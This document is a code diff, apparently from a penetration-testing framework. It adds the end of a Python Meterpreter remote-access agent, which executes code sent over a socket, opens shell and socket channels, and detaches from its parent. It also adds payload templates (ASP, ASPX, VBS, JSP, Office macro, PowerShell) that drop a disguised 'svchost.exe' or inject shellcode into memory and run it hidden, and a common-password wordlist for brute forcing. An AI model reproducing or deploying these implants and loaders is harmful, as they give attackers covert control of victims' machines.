+		while idx in self.channels:
+			idx += 1
+		self.channels[idx] = channel
+		return idx
+
+	def add_process(self, process):
+		idx = 0
+		while idx in self.processes:
+			idx += 1
+		self.processes[idx] = process
+		return idx
+
+	def run(self):
+		while self.running:
+			if len(select.select([self.socket], [], [], 0.5)[0]):
+				request = self.socket.recv(8)
+				if len(request) != 8:
+					break
+				req_length, req_type = struct.unpack('>II', request)
+				req_length -= 8
+				request = ''
+				while len(request) < req_length:
+					request += self.socket.recv(4096)
+				response = self.create_response(request)
+				self.socket.send(response)
+			else:
+				channels_for_removal = []
+				channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed
+				for channel_id in channel_ids:
+					channel = self.channels[channel_id]
+					data = ''
+					if isinstance(channel, STDProcess):
+						if not channel_id in self.interact_channels:
+							continue
+						if channel.stdout_reader.is_read_ready():
+							data = channel.stdout_reader.read()
+						elif channel.stderr_reader.is_read_ready():
+							data = channel.stderr_reader.read()
+						elif channel.poll() != None:
+							self.handle_dead_resource_channel(channel_id)
+					elif isinstance(channel, socket._socketobject):
+						while len(select.select([channel.fileno()], [], [], 0)[0]):
+							try:
+								d = channel.recv(1)
+							except socket.error:
+								d = ''
+							if len(d) == 0:
+								self.handle_dead_resource_channel(channel_id)
+								break
+							data += d
+					if data:
+						pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
+						pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
+						pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+						pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
+						pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
+						pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
+						pkt  = struct.pack('>I', len(pkt) + 4) + pkt
+						self.socket.send(pkt)
+
+	def handle_dead_resource_channel(self, channel_id):
+		del self.channels[channel_id]
+		if channel_id in self.interact_channels:
+			self.interact_channels.remove(channel_id)
+		pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
+		pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
+		pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
+		pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+		pkt  = struct.pack('>I', len(pkt) + 4) + pkt
+		self.socket.send(pkt)
+
+	def _core_loadlib(self, request, response):
+		data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
+		if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
+			return ERROR_FAILURE
+		preloadlib_methods = self.extension_functions.keys()
+		i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
+		i.runcode(compile(data_tlv['value'], '', 'exec'))
+		postloadlib_methods = self.extension_functions.keys()
+		new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
+		for method in new_methods:
+			response += tlv_pack(TLV_TYPE_METHOD, method)
+		return ERROR_SUCCESS, response
+
+	def _core_shutdown(self, request, response):
+		response += tlv_pack(TLV_TYPE_BOOL, True)
+		self.running = False
+		return ERROR_SUCCESS, response
+
+	def _core_channel_open(self, request, response):
+		channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
+		handler = 'channel_create_' + channel_type['value']
+		if handler not in self.extension_functions:
+			return ERROR_FAILURE, response
+		handler = self.extension_functions[handler]
+		return handler(request, response)
+
+	def _core_channel_close(self, request, response):
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+		if channel_id not in self.channels:
+			return ERROR_FAILURE, response
+		channel = self.channels[channel_id]
+		if isinstance(channel, file):
+			channel.close()
+		elif isinstance(channel, subprocess.Popen):
+			channel.kill()
+		elif isinstance(s, socket._socketobject):
+			channel.close()
+		else:
+			return ERROR_FAILURE, response
+		del self.channels[channel_id]
+		if channel_id in self.interact_channels:
+			self.interact_channels.remove(channel_id)
+		return ERROR_SUCCESS, response
+
+	def _core_channel_eof(self, request, response):
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+		if channel_id not in self.channels:
+			return ERROR_FAILURE, response
+		channel = self.channels[channel_id]
+		result = False
+		if isinstance(channel, file):
+			result = channel.tell() == os.fstat(channel.fileno()).st_size
+		response += tlv_pack(TLV_TYPE_BOOL, result)
+		return ERROR_SUCCESS, response
+
+	def _core_channel_interact(self, request, response):
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+		if channel_id not in self.channels:
+			return ERROR_FAILURE, response
+		channel = self.channels[channel_id]
+		toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
+		if toggle:
+			if channel_id in self.interact_channels:
+				self.interact_channels.remove(channel_id)
+			else:
+				self.interact_channels.append(channel_id)
+		elif channel_id in self.interact_channels:
+			self.interact_channels.remove(channel_id)
+		return ERROR_SUCCESS, response
+
+	def _core_channel_read(self, request, response):
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+		length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
+		if channel_id not in self.channels:
+			return ERROR_FAILURE, response
+		channel = self.channels[channel_id]
+		data = ''
+		if isinstance(channel, file):
+			data = channel.read(length)
+		elif isinstance(channel, STDProcess):
+			if channel.poll() != None:
+				self.handle_dead_resource_channel(channel_id)
+			if channel.stdout_reader.is_read_ready():
+				data = channel.stdout_reader.read(length)
+		elif isinstance(s, socket._socketobject):
+			data = channel.recv(length)
+		else:
+			return ERROR_FAILURE, response
+		response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
+		return ERROR_SUCCESS, response
+
+	def _core_channel_write(self, request, response):
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+		channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
+		length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
+		if channel_id not in self.channels:
+			return ERROR_FAILURE, response
+		channel = self.channels[channel_id]
+		l = len(channel_data)
+		if isinstance(channel, file):
+			channel.write(channel_data)
+		elif isinstance(channel, subprocess.Popen):
+			if channel.poll() != None:
+				self.handle_dead_resource_channel(channel_id)
+				return ERROR_FAILURE, response
+			channel.stdin.write(channel_data)
+		elif isinstance(s, socket._socketobject):
+			try:
+				l = channel.send(channel_data)
+			except socket.error:
+				channel.close()
+				self.handle_dead_resource_channel(channel_id)
+				return ERROR_FAILURE, response
+		else:
+			return ERROR_FAILURE, response
+		response += tlv_pack(TLV_TYPE_LENGTH, l)
+		return ERROR_SUCCESS, response
+
+	def create_response(self, request):
+		resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
+		method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
+		resp += tlv_pack(method_tlv)
+
+		reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
+		resp += tlv_pack(reqid_tlv)
+
+		handler_name = method_tlv['value']
+		if handler_name in self.extension_functions:
+			handler = self.extension_functions[handler_name]
+			try:
+				#print("[*] running method {0}".format(handler_name))
+				result, resp = handler(request, resp)
+			except Exception, err:
+				#print("[-] method {0} resulted in an error".format(handler_name))
+				result = ERROR_FAILURE
+		else:
+			#print("[-] method {0} was requested but does not exist".format(handler_name))
+			result = ERROR_FAILURE
+		resp += tlv_pack(TLV_TYPE_RESULT, result)
+		resp = struct.pack('>I', len(resp) + 4) + resp
+		return resp
+
+if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
+	if hasattr(os, 'setsid'):
+		os.setsid()
+	met = PythonMeterpreter(s)
+	met.run()

data/templates/scripts/to_exe.asp.template

@@ -0,0 +1,24 @@
+<%% @language="VBScript" %%>
+<%% 
+	Sub %{var_func}()
+		%{var_shellcode}
+		Dim %{var_obj}
+		Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+		Dim %{var_stream}
+		Dim %{var_tempdir}
+		Dim %{var_tempexe}
+		Dim %{var_basedir}
+		Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+		%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+		%{var_obj}.CreateFolder(%{var_basedir})
+		%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+		Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe},2,0)
+		%{var_stream}.Write %{var_bytes}
+		%{var_stream}.Close
+		Dim %{var_shell}
+		Set %{var_shell} = CreateObject("Wscript.Shell")
+		%{var_shell}.run %{var_tempexe}, 0, false
+	End Sub
+
+	%{var_func}
+%%>

data/templates/scripts/to_exe.aspx.template

@@ -0,0 +1,30 @@
+<%%@ Page Language="C#" AutoEventWireup="true" %%>
+<%%@ Import Namespace="System.IO" %%>
+<script runat="server">
+	protected void Page_Load(object sender, EventArgs e)
+	{
+		%{shellcode}
+		string %{var_tempdir} = Path.GetTempPath();
+		string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
+		string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");
+		
+		Directory.CreateDirectory(%{var_basedir});
+		
+		FileStream fs = File.Create(%{var_tempexe});
+		
+		try
+		{
+			fs.Write(%{var_file}, 0, %{var_file}.Length);
+		}
+		finally
+		{
+			if (fs != null) ((IDisposable)fs).Dispose();
+		}
+
+		System.Diagnostics.Process %{var_proc} = new System.Diagnostics.Process();
+		%{var_proc}.StartInfo.CreateNoWindow = true;
+		%{var_proc}.StartInfo.UseShellExecute = true;
+		%{var_proc}.StartInfo.FileName = %{var_tempexe};
+		%{var_proc}.Start();
+	}
+</script>

data/templates/scripts/to_exe.vba.template

@@ -0,0 +1,81 @@
+'**************************************************************
+'*
+'* This code is now split into two pieces:
+'*  1. The Macro. This must be copied into the Office document
+'*     macro editor. This macro will run on startup.
+'*
+'*  2. The Data. The hex dump at the end of this output must be
+'*     appended to the end of the document contents.
+'*
+'**************************************************************
+'*
+'* MACRO CODE
+'*
+'**************************************************************
+
+Sub Auto_Open()
+	%{func_name1}
+End Sub
+
+Sub %{func_name1}()
+	Dim %{var_appnr} As Integer
+	Dim %{var_fname} As String
+	Dim %{var_fenvi} As String
+	Dim %{var_fhand} As Integer
+	Dim %{var_parag} As Paragraph
+	Dim %{var_index} As Integer
+	Dim %{var_gotmagic} As Boolean
+	Dim %{var_itemp} As Integer
+	Dim %{var_stemp} As String
+	Dim %{var_btemp} As Byte
+	Dim %{var_magic} as String
+	%{var_magic} = "%{var_magic}"
+	%{var_fname} = "%{filename}.exe"
+	%{var_fenvi} = Environ("USERPROFILE")
+	ChDrive (%{var_fenvi})
+	ChDir (%{var_fenvi})
+	%{var_fhand} = FreeFile()
+	Open %{var_fname} For Binary As %{var_fhand}
+	For Each %{var_parag} in ActiveDocument.Paragraphs
+		DoEvents
+			%{var_stemp} = %{var_parag}.Range.Text
+		If (%{var_gotmagic} = True) Then
+			%{var_index} = 1
+			While (%{var_index} < Len(%{var_stemp}))
+				%{var_btemp} = Mid(%{var_stemp},%{var_index},4)
+				Put #%{var_fhand}, , %{var_btemp}
+				%{var_index} = %{var_index} + 4
+			Wend
+		ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then
+			%{var_gotmagic} = True
+		End If
+	Next
+	Close #%{var_fhand}
+	%{func_name2}(%{var_fname})
+End Sub
+
+Sub %{func_name2}(%{var_farg} As String)
+	Dim %{var_appnr} As Integer
+	Dim %{var_fenvi} As String
+	%{var_fenvi} = Environ("USERPROFILE")
+	ChDrive (%{var_fenvi})
+	ChDir (%{var_fenvi})
+	%{var_appnr} = Shell(%{var_farg}, vbHide)
+End Sub
+
+Sub AutoOpen()
+	Auto_Open
+End Sub
+
+Sub Workbook_Open()
+	Auto_Open
+End Sub
+
+'**************************************************************
+'*
+'* PAYLOAD DATA
+'*
+'**************************************************************
+
+%{var_magic}
+%{data}

data/templates/scripts/to_exe.vbs.template

@@ -0,0 +1,24 @@
+Function %{var_func}()
+%{var_shellcode}
+
+	Dim %{var_obj}
+	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+	Dim %{var_stream}
+	Dim %{var_tempdir}
+	Dim %{var_tempexe}
+	Dim %{var_basedir}
+	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+	%{var_obj}.CreateFolder(%{var_basedir})
+	%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
+	%{var_stream}.Write %{var_bytes}
+	%{var_stream}.Close
+	Dim %{var_shell}
+	Set %{var_shell} = CreateObject("Wscript.Shell")
+	%{var_shell}.run %{var_tempexe}, 0, true
+	%{var_obj}.DeleteFile(%{var_tempexe})
+	%{var_obj}.DeleteFolder(%{var_basedir})
+End Function
+
+%{init}

data/templates/scripts/to_exe_jsp.war.template

@@ -0,0 +1,49 @@
+<%%@ page import="java.io.*" %%>
+<%%
+	String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
+	String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
+	String %{var_data} = "";
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
+	{
+		%{var_exepath} = %{var_exepath}.concat(".exe");
+	}
+
+	FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
+	FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
+
+	int %{var_numbytes} = %{var_inputstream}.available();
+	byte %{var_bytearray}[] = new byte[%{var_numbytes}];
+	%{var_inputstream}.read(%{var_bytearray});
+	%{var_inputstream}.close();
+	byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
+	for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
+	{
+		char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
+		char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
+		int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
+		%{var_comb} <<= 4;
+		%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
+		%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
+	}
+
+	%{var_outputstream}.write(%{var_bytes});
+	%{var_outputstream}.close();
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
+		String[] %{var_fperm} = new String[3];
+		%{var_fperm}[0] = "chmod";
+		%{var_fperm}[1] = "+x";
+		%{var_fperm}[2] = %{var_exepath};
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
+		if (%{var_proc}.waitFor() == 0) {
+			%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+		}
+		
+		File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
+	} 
+	else 
+	{
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+	}
+%%>

data/templates/scripts/to_mem.vba.template

@@ -0,0 +1,32 @@
+#If Vba7 Then
+	Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As LongPtr, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As LongPtr
+	Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As LongPtr
+	Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As LongPtr, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As LongPtr
+#Else
+	Private Declare Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As Long, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As Long
+	Private Declare Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As Long
+	Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As Long, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As Long
+#EndIf
+
+Sub Auto_Open()
+	Dim %{var_myByte} As Long, %{var_myArray} As Variant, %{var_offset} As Long
+#If Vba7 Then
+	Dim  %{var_rwxpage} As LongPtr, %{var_res} As LongPtr
+#Else
+	Dim  %{var_rwxpage} As Long, %{var_res} As Long
+#EndIf
+	%{bytes}
+	%{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40)
+	For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray})
+		%{var_myByte} = %{var_myArray}(%{var_offset})
+		%{var_res} = RtlMoveMemory(%{var_rwxpage} + %{var_offset}, %{var_myByte}, 1)
+	Next %{var_offset}
+	%{var_res} = CreateThread(0, 0, %{var_rwxpage}, 0, 0, 0)
+End Sub
+Sub AutoOpen()
+	Auto_Open
+End Sub
+Sub Workbook_Open()
+	Auto_Open
+End Sub
+

data/templates/scripts/to_mem_dotnet.ps1.template

@@ -0,0 +1,30 @@
+Set-StrictMode -Version 2
+$%{var_syscode} = @"
+	using System;
+	using System.Runtime.InteropServices;
+	namespace %{var_kernel32} {
+		public class func {
+			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+		}
+	}
+"@
+
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory = $True
+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
+
+%{shellcode}
+
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)

data/templates/scripts/to_mem_old.ps1.template

@@ -0,0 +1,20 @@
+$%{var_syscode} = @"
+[DllImport("kernel32.dll")]
+public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+[DllImport("msvcrt.dll")]
+public static extern IntPtr memset(IntPtr dest, uint src, uint count);
+"@
+
+$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
+
+%{shellcode}
+
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
+
+for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
+	$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
+}
+
+$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)

data/wordlists/burnett_top_500.txt

@@ -0,0 +1,500 @@
+password
+123456
+12345678
+1234
+qwerty
+12345
+dragon
+pussy
+baseball
+football
+letmein
+monkey
+696969
+abc123
+mustang
+michael
+shadow
+master
+jennifer
+111111
+2000
+jordan
+superman
+harley
+1234567
+fuckme
+hunter
+fuckyou
+trustno1
+ranger
+buster
+thomas
+tigger
+robert
+soccer
+fuck
+batman
+test
+pass
+killer
+hockey
+george
+charlie
+andrew
+michelle
+love
+sunshine
+jessica
+asshole
+6969
+pepper
+daniel
+access
+123456789
+654321
+joshua
+maggie
+starwars
+silver
+william
+dallas
+yankees
+123123
+ashley
+666666
+hello
+amanda
+orange
+biteme
+freedom
+computer
+sexy
+thunder
+nicole
+ginger
+heather
+hammer
+summer
+corvette
+taylor
+fucker
+austin
+1111
+merlin
+matthew
+121212
+golfer
+cheese
+princess
+martin
+chelsea
+patrick
+richard
+diamond
+yellow
+bigdog
+secret
+asdfgh
+sparky
+cowboy
+camaro
+anthony
+matrix
+falcon
+iloveyou
+bailey
+guitar
+jackson
+purple
+scooter
+phoenix
+aaaaaa
+morgan
+tigers
+porsche
+mickey
+maverick
+cookie
+nascar
+peanut
+justin
+131313
+money
+horny
+samantha
+panties
+steelers
+joseph
+snoopy
+boomer
+whatever
+iceman
+smokey
+gateway
+dakota
+cowboys
+eagles
+chicken
+dick
+black
+zxcvbn
+please
+andrea
+ferrari
+knight
+hardcore
+melissa
+compaq
+coffee
+booboo
+bitch
+johnny
+bulldog
+xxxxxx
+welcome
+james
+player
+ncc1701
+wizard
+scooby
+charles
+junior
+internet
+bigdick
+mike
+brandy
+tennis
+blowjob
+banana
+monster
+spider
+lakers
+miller
+rabbit
+enter
+mercedes
+brandon
+steven
+fender
+john
+yamaha
+diablo
+chris
+boston
+tiger
+marine
+chicago
+rangers
+gandalf
+winter
+bigtits
+barney
+edward
+raiders
+porn
+badboy
+blowme
+spanky
+bigdaddy
+johnson
+chester
+london
+midnight
+blue
+fishing
+000000
+hannah
+slayer
+11111111
+rachel
+sexsex
+redsox
+thx1138
+asdf
+marlboro
+panther
+zxcvbnm
+arsenal
+oliver
+qazwsx
+mother
+victoria
+7777777
+jasper
+angel
+david
+winner
+crystal
+golden
+butthead
+viking
+jack
+iwantu
+shannon
+murphy
+angels
+prince
+cameron
+girls
+madison
+wilson
+carlos
+hooters
+willie
+startrek
+captain
+maddog
+jasmine
+butter
+booger
+angela
+golf
+lauren
+rocket
+tiffany
+theman
+dennis
+liverpoo
+flower
+forever
+green
+jackie
+muffin
+turtle
+sophie
+danielle
+redskins
+toyota
+jason
+sierra
+winston
+debbie
+giants
+packers
+newyork
+jeremy
+casper
+bubba
+112233
+sandra
+lovers
+mountain
+united
+cooper
+driver
+tucker
+helpme
+fucking
+pookie
+lucky
+maxwell
+8675309
+bear
+suckit
+gators
+5150
+222222
+shithead
+fuckoff
+jaguar
+monica
+fred
+happy
+hotdog
+tits
+gemini
+lover
+xxxxxxxx
+777777
+canada
+nathan
+victor
+florida
+88888888
+nicholas
+rosebud
+metallic
+doctor
+trouble
+success
+stupid
+tomcat
+warrior
+peaches
+apples
+fish
+qwertyui
+magic
+buddy
+dolphins
+rainbow
+gunner
+987654
+freddy
+alexis
+braves
+cock
+2112
+1212
+cocacola
+xavier
+dolphin
+testing
+bond007
+member
+calvin
+voodoo
+7777
+samson
+alex
+apollo
+fire
+tester
+walter
+beavis
+voyager
+peter
+porno
+bonnie
+rush2112
+beer
+apple
+scorpio
+jonathan
+skippy
+sydney
+scott
+red123
+power
+gordon
+travis
+beaver
+star
+jackass
+flyers
+boobs
+232323
+zzzzzz
+steve
+rebecca
+scorpion
+doggie
+legend
+ou812
+yankee
+blazer
+bill
+runner
+birdie
+bitches
+555555
+parker
+topgun
+asdfasdf
+heaven
+viper
+animal
+2222
+bigboy
+4444
+arthur
+baby
+private
+godzilla
+donald
+williams
+lifehack
+phantom
+dave
+rock
+august
+sammy
+cool
+brian
+platinum
+jake
+bronco
+paul
+mark
+frank
+heka6w2
+copper
+billy
+cumshot
+garfield
+willow
+cunt
+little
+carter
+slut
+albert
+69696969
+kitten
+super
+jordan23
+eagle1
+shelby
+america
+11111
+jessie
+house
+free
+123321
+chevy
+bullshit
+white
+broncos
+horney
+surfer
+nissan
+999999
+saturn
+airborne
+elephant
+marvin
+shit
+action
+adidas
+qwert
+kevin
+1313
+explorer
+walker
+police
+christin
+december
+benjamin
+wolf
+sweet
+therock
+king
+online
+dickhead
+brooklyn
+teresa
+cricket
+sharon
+dexter
+racing
+penis
+gregory
+0000
+teens
+redwings
+dreams
+michigan
+hentai
+magnum
+87654321
+nothing
+donkey
+trinity
+digital
+3